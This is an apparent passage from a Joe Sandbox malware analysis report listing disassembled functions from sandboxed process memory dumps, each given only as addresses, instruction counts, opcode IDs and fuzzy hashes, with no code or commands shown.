              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c20d7724849341db1b2dd85aab19a558e06a36ac6b88a4692b71ef288a086f1c
              • Instruction ID: 1f562c8fd8c278ebf9a3d0e6768c07c42a7057825cb0958245db090caf9588ab
              • Opcode Fuzzy Hash: c20d7724849341db1b2dd85aab19a558e06a36ac6b88a4692b71ef288a086f1c
              • Instruction Fuzzy Hash: 03016DB080A68E8FDF95DE38D4696AA7BE0EF65301F4140BAE808C6192DA76D954C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6BC69 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea11fb52d01b835b9096563fcf097167b270144b96a563008e3dda3bb51b4416
              • Instruction ID: d789cd2fbc41c3daf14720b4d5e0575ebf68c6acc0d44854f39ffd678b127ea6
              • Opcode Fuzzy Hash: ea11fb52d01b835b9096563fcf097167b270144b96a563008e3dda3bb51b4416
              • Instruction Fuzzy Hash: 8601A2B08096CE4FEB96AF34CC581B93BF0FF15305F4005BAD818C2092DF3595188780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF60D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9f0de0058dd9144c65e3c9d16d37ebd32ecbef13f462db230fa23b8a57d29ad5
              • Instruction ID: 10e2a40edf4c966b2658541a64c45c00a9be360e6df38b1c4be7a1d750d1499a
              • Opcode Fuzzy Hash: 9f0de0058dd9144c65e3c9d16d37ebd32ecbef13f462db230fa23b8a57d29ad5
              • Instruction Fuzzy Hash: A5F0C2B1C2958E9AEBA69A78E81D3FDBBE0FF15314F00167AD80DC1481DF766598C342
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6C069 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4aa3f144442f58258653a249e2ad294b036ff54cdf58da0999b430cad2bac39e
              • Instruction ID: e7bd7cab50c1892df1ac73b2cae2c52da4d0918e43eca10660a3dd9df335160c
              • Opcode Fuzzy Hash: 4aa3f144442f58258653a249e2ad294b036ff54cdf58da0999b430cad2bac39e
              • Instruction Fuzzy Hash: 0001D6B180D3CE5FDB569F3488191A93FB0EF16301F5005BBD888C6092CA35D958C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF601C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f1e4a72a76aec0ff027665054b28e0b7a1bb97dd3c10700028da89b1df02dd2e
              • Instruction ID: c38c40429c2a374e39caefdd52c9aafe1de5368193af979281162ea282599065
              • Opcode Fuzzy Hash: f1e4a72a76aec0ff027665054b28e0b7a1bb97dd3c10700028da89b1df02dd2e
              • Instruction Fuzzy Hash: 79F04FB080958E8FEF95EE38D4596FA77A4EF55304F50447AE80DC3191CA76E594CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF608FA Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 784ea6d8a2bdd31bb7545b0d497762e2faef8f48c67dfaae3595e75043578e71
              • Instruction ID: 917195bed05bb9947466b142c6f3dd45a92c298711fee2ddfe0fad5b709cb6e0
              • Opcode Fuzzy Hash: 784ea6d8a2bdd31bb7545b0d497762e2faef8f48c67dfaae3595e75043578e71
              • Instruction Fuzzy Hash: 41F022B2C089890EEB09EF38C48E5E9B3A2FF08310F1501B5C50A9B1A3CD34B84A8A40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6C543 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8dfe31e3bef372061dac1cd575cc60c9db2ff6db1a0bd186944563b7bc1d8899
              • Instruction ID: 5a54217ae719ca871ba1973534aaf5362d3b8fc1e3fad1c00fc07fabe80da1d3
              • Opcode Fuzzy Hash: 8dfe31e3bef372061dac1cd575cc60c9db2ff6db1a0bd186944563b7bc1d8899
              • Instruction Fuzzy Hash: C4F03CF0C1968E4EEB95AE78C8191F97EE0FF58301F00057AE858C2091DB7599588740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF62659 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 944e351d0210d504d6636f7a218787ee4faf43f4e47f7297e559a2e3324fa04f
              • Instruction ID: 9140b9650987dd453ac68490da422d1e2a50fc66123d32a7d72ca48c4994dfb8
              • Opcode Fuzzy Hash: 944e351d0210d504d6636f7a218787ee4faf43f4e47f7297e559a2e3324fa04f
              • Instruction Fuzzy Hash: 65F062B080E3CA8FEB5A9B3488291A97FB0BF16201F4544BFE809C61D3DB7A9458C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF63234 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91a8a97ff281e4315d90f4207b5111a8886d1a4c1b3580894bc5e9073af63811
              • Instruction ID: f46d2b060a8745cd5e47d1afade6b3a4d3b42ae4ac10e3249512ef6151366795
              • Opcode Fuzzy Hash: 91a8a97ff281e4315d90f4207b5111a8886d1a4c1b3580894bc5e9073af63811
              • Instruction Fuzzy Hash: 84F044F1D095998FEB59CA78C4986FC7BB1EF54300F104039D809932C1CA3AA58DDF10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6AD58 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 42bea0d0016756362f047969742f477462bc903710e657383f5a9d742248679a
              • Instruction ID: e2f461a692cab3215bcb67f906fa328ca290122009fe8593b186043503cb2b24
              • Opcode Fuzzy Hash: 42bea0d0016756362f047969742f477462bc903710e657383f5a9d742248679a
              • Instruction Fuzzy Hash: 89F0AFB0D4A55D8EEB92EB28C489BEAB3B0FF59300F5042AAC00DD3152CB35E985DF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF626CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6808d547e61d9e1f2d9f4ac0a50016f1c7eb12002acbe4500da4bd1f189be14
              • Instruction ID: d69d7643431260d1b0f38bd05df800cda47c64e3cc233282ae86b3f1bcbde2d6
              • Opcode Fuzzy Hash: b6808d547e61d9e1f2d9f4ac0a50016f1c7eb12002acbe4500da4bd1f189be14
              • Instruction Fuzzy Hash: 5CF0F6B080E38E4FE76A9F34C8192B9BBA0FF05300F4004BAE809C50D2EB39D458C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF681D1 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a732bdb699463a9bffc5413f611542681ec79bed3b5b2a110a164fcf9a7e7b8
              • Instruction ID: e3d5fc1fd4833ba0f1b9a3ec8e2f0e6a08b470587c0aec24f7c27943d8b36fad
              • Opcode Fuzzy Hash: 3a732bdb699463a9bffc5413f611542681ec79bed3b5b2a110a164fcf9a7e7b8
              • Instruction Fuzzy Hash: 36F044F0D0969A8FDBA6CB38C8447F9B7F4AF19301F1001E5D44D92242CA395BC99F04
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF66E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cd96b9d4cb7012466527836ad414e13126458740a3856c080a768a537bc5a745
              • Instruction ID: 4ae26c76490d564771bc1506f34b191589a46169a5eec49dfd655e3e035e51e3
              • Opcode Fuzzy Hash: cd96b9d4cb7012466527836ad414e13126458740a3856c080a768a537bc5a745
              • Instruction Fuzzy Hash: FDF0F8F0D09A6A8FDBA6DB28C8447A9B7F4AB18300F1001E9940DE3242CA349BC58F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6BA62 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction ID: f33af6681f0495addefc284bc2b39e98fa645c426072b2d8b03ccf63049ee8bc
              • Opcode Fuzzy Hash: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction Fuzzy Hash: 61D0E2B5A0886DCF8F40EFA8D8041ECB3B0FB58301B000032D80DE3141CB30A8148B40
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Function 00007FFBACF7BF41 Relevance: .4, Instructions: 445COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7ef22d75ea480269beed2a76dd5f74cbfd92c07c379d5c95b69a95e56c212d7
              • Instruction ID: e7a2b78cc85dd9d5ff4976fa06937a5650f9168b0014676132524f4ec5b655e3
              • Opcode Fuzzy Hash: e7ef22d75ea480269beed2a76dd5f74cbfd92c07c379d5c95b69a95e56c212d7
              • Instruction Fuzzy Hash: D8E18FB0908A4D8FEBA9DF28C8497E977D1FF54310F50426EE84EC7291CA75A9458B81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7CCF1 Relevance: .4, Instructions: 428COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf89c451e273861ab19e0baecfee4b7fccc4d924d6a6dbbbdab3b5afc966d009
              • Instruction ID: ae89203b9dcdc90117664dc4a1c3464bb5ff97544f7de773db1dac3bd35be25c
              • Opcode Fuzzy Hash: bf89c451e273861ab19e0baecfee4b7fccc4d924d6a6dbbbdab3b5afc966d009
              • Instruction Fuzzy Hash: 04D19EB0A08A4D8FEBA9DF38D8597E977D1FB54310F10822EE80DC7291DE75E9458B81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5EE6E Relevance: 6.3, Strings: 5, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548945419.00007FFBACF5E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5e000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: !$3$A$]$k
              • API String ID: 0-237419272
              • Opcode ID: ba3313e72a1158bd954969f1afcad03f97f30a5ec5345719df1f0114a4cc5ba3
              • Instruction ID: 829fa5b58a21c0d1a6d7bc51055bb461339f591380c0e68e554b51a056c8ada0
              • Opcode Fuzzy Hash: ba3313e72a1158bd954969f1afcad03f97f30a5ec5345719df1f0114a4cc5ba3
              • Instruction Fuzzy Hash: 26311AF0D0962E8BDBA9DF24C8997E9B7B1EB55310F0041E9D54DA7281CB39AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5EC8D Relevance: 6.3, Strings: 5, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548945419.00007FFBACF5E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5e000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: #$3$A$[$k
              • API String ID: 0-610135868
              • Opcode ID: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction ID: 6efdd5c2cd6fa58c65e93bdfbe84f1df1de606faae0a35114e33684be73ea32f
              • Opcode Fuzzy Hash: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction Fuzzy Hash: 2C21D8F0D0962D8BEB69DF24C8557E977B1BB59300F0041A9D90DA6285CB79AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C4AB Relevance: 2.6, Strings: 2, Instructions: 105COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: _$}\_^
              • API String ID: 0-894959800
              • Opcode ID: b5f93715ab0c32fb88119bd16612d0b1eb4cdc0522539568b14ea33aa1135323
              • Instruction ID: b99d01a8170cb8e9cc9004a22e4e9c397443abb1e4b950148bb812326d7588f0
              • Opcode Fuzzy Hash: b5f93715ab0c32fb88119bd16612d0b1eb4cdc0522539568b14ea33aa1135323
              • Instruction Fuzzy Hash: E73196E6D0952E4AEB46BBBDE4190FD7BD0DF59331F000036DB1AC5092DF25A88ACA94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF74CE1 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: n_H
              • API String ID: 0-2249924145
              • Opcode ID: 878cd5858b289fbae3efb2605c6f01a6d94c8003473a4a3b1ee202b50e4f99fc
              • Instruction ID: ce202acdc35247703d171ee7b3bf4852fbbf8656ae9d9c24b4d5a61a6d18d61b
              • Opcode Fuzzy Hash: 878cd5858b289fbae3efb2605c6f01a6d94c8003473a4a3b1ee202b50e4f99fc
              • Instruction Fuzzy Hash: 6281C3B0D099198FDB99EB78C4997EDBBB1FF58310F604079D40AE3281DE35A8898B51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6BD48 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: e5602d6ff834eb9c843b02e58c5b64341870f7e776191d74627b8edeca40d833
              • Instruction ID: 124990d9a1666cf3375ac36ae48460aff4bfea868b8cdca407225740198fee29
              • Opcode Fuzzy Hash: e5602d6ff834eb9c843b02e58c5b64341870f7e776191d74627b8edeca40d833
              • Instruction Fuzzy Hash: 1F518FB1D0954E8FDB5ADBB8C8986EDB7B1FF54300F1041BAC41ADB292CE39A905DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C455 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: _
              • API String ID: 0-701932520
              • Opcode ID: a715b23d2d70d45e5648bbbe7c7cbc6737ddf3f6ac10de5d962e115be27846ec
              • Instruction ID: e5b405c59b0165f1691f0ec8d09da594186033a6ea4d2ce8147819d9f3f1ee35
              • Opcode Fuzzy Hash: a715b23d2d70d45e5648bbbe7c7cbc6737ddf3f6ac10de5d962e115be27846ec
              • Instruction Fuzzy Hash: A8419BF6D1952E4AEB55BBBDE4490FD7BD0DF59321F000536D60AC5092CF25B88ACAA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C3FD Relevance: 1.3, Strings: 1, Instructions: 78COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 3e655db9f1fdb4261a02276ed5d246f2e2c46b9ac2286f16689e2518dd39fd81
              • Instruction ID: 07fa645a29f8e50d6f1d4e0bf227b91d18e4c40e683dcb47a02cfce82998eb80
              • Opcode Fuzzy Hash: 3e655db9f1fdb4261a02276ed5d246f2e2c46b9ac2286f16689e2518dd39fd81
              • Instruction Fuzzy Hash: 8011DA77A1861E8EEB54AB7DE4091FE73D0EF84331F000537D65AC2441DB34A59ACAD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7300D Relevance: .6, Instructions: 647COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc0120eb0b9a7948d191e7d7063deaa416560bb1360b316c37b80bbb8195a891
              • Instruction ID: 264745aeabac898908cd300e9d392a95c3880581e530177e0bd863dad0c17989
              • Opcode Fuzzy Hash: fc0120eb0b9a7948d191e7d7063deaa416560bb1360b316c37b80bbb8195a891
              • Instruction Fuzzy Hash: 204264B090992D8FDFA8EB28C854BA9B7B1FB58305F1001EA950DE3691DB759EC1CF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6C1CF Relevance: .5, Instructions: 542COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a3a8dc602df338ac7f949ecdd53b60d1fb97f8950c102f1c63a541853806a98
              • Instruction ID: 0bc0cf222bd1ba37bc3a90c3031e9ff6208b9bcb1f749598d758f302a66f1680
              • Opcode Fuzzy Hash: 6a3a8dc602df338ac7f949ecdd53b60d1fb97f8950c102f1c63a541853806a98
              • Instruction Fuzzy Hash: 5F1291B0D195998FEB5EDB78C4A46B877A1FF59300F1041BDC88FD7282DA39A985CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6F9A9 Relevance: .5, Instructions: 470COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f26839b2a5556f7ed74c47f09f827a8b3b6da8f6e09351b23b35177a6bdf0fb2
              • Instruction ID: 9eac4b3be079d0bfe4f094d095ced3b3cdcb480d85604ab0ceee4a5cd6bbc412
              • Opcode Fuzzy Hash: f26839b2a5556f7ed74c47f09f827a8b3b6da8f6e09351b23b35177a6bdf0fb2
              • Instruction Fuzzy Hash: 920249B1D0891D8FEB95EB68C8997E8B7B1FF58300F5005B9D40EE7292CE35A985CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF62BF5 Relevance: .4, Instructions: 409COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f08114b5288581b751d9350cc9cb752980bb68248079fd0cdb0a43bd1a1ab6ed
              • Instruction ID: cb73e9f809dba81493bc03dacf518a080d7f403258baff67df415bc0c7c8d579
              • Opcode Fuzzy Hash: f08114b5288581b751d9350cc9cb752980bb68248079fd0cdb0a43bd1a1ab6ed
              • Instruction Fuzzy Hash: 76C1C7D7D0E2D60BE713A77CF8561F97FD09F42235B0800B7D58889497EE26D88E86A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF68018 Relevance: .4, Instructions: 372COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ec5d1a5b93eedee6241136816085aae6ccf5799b3554225c0dc3d5b85c95ada0
              • Instruction ID: f7f958466d9a524bb8dabe2671de872a35c20f0edbc1c534c27bf55329299c87
              • Opcode Fuzzy Hash: ec5d1a5b93eedee6241136816085aae6ccf5799b3554225c0dc3d5b85c95ada0
              • Instruction Fuzzy Hash: 89E191B090992D8FDBA5EB28C895BE9B7F1FF59300F5101A9D40DE3291DB35AA85CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6B862 Relevance: .3, Instructions: 337COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5db98796c44c0b6bbc89fedb93f40a3f6a602778c820ac201d0cf178de905b3b
              • Instruction ID: 5028e51148f6f2a7fdde341f90ce8cfd4b88861446c82dbe9329a9f4571aee56
              • Opcode Fuzzy Hash: 5db98796c44c0b6bbc89fedb93f40a3f6a602778c820ac201d0cf178de905b3b
              • Instruction Fuzzy Hash: DCC1E1B0909A858FD76ADB38C4946A6B7E1FF45310F14457EC88EC7A92DA39F846CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7EC40 Relevance: .3, Instructions: 323COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc2f5987b6ea5cd0c6169f0c78fe947eae6f86310666c7d8d2e1b21f5d3c86e7
              • Instruction ID: bd82819aac3f4e968d82687aa161950cfa6b10de48e5f4097dc6c875df5ce223
              • Opcode Fuzzy Hash: fc2f5987b6ea5cd0c6169f0c78fe947eae6f86310666c7d8d2e1b21f5d3c86e7
              • Instruction Fuzzy Hash: 1A8114B2B1DE0A4FE799EA2CD4855B5B3D1FF99310B50017AD48EC3292DD25F8068785
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF72650 Relevance: .3, Instructions: 317COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cbc9dbb3a2501eec2b2c2aaae68859ca3f6a806f278e412ea7b097cf9e54fda
              • Instruction ID: 6ba4dbe7158eb341ebf587b3f64ea0cbd96d70fb76df3280e0fa1302a838e3a7
              • Opcode Fuzzy Hash: 6cbc9dbb3a2501eec2b2c2aaae68859ca3f6a806f278e412ea7b097cf9e54fda
              • Instruction Fuzzy Hash: 63D1C4B0D1996D8FEB95EB28C8997E8B3B1FF58300F5001A9950DE3292DE356E85CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7EC88 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
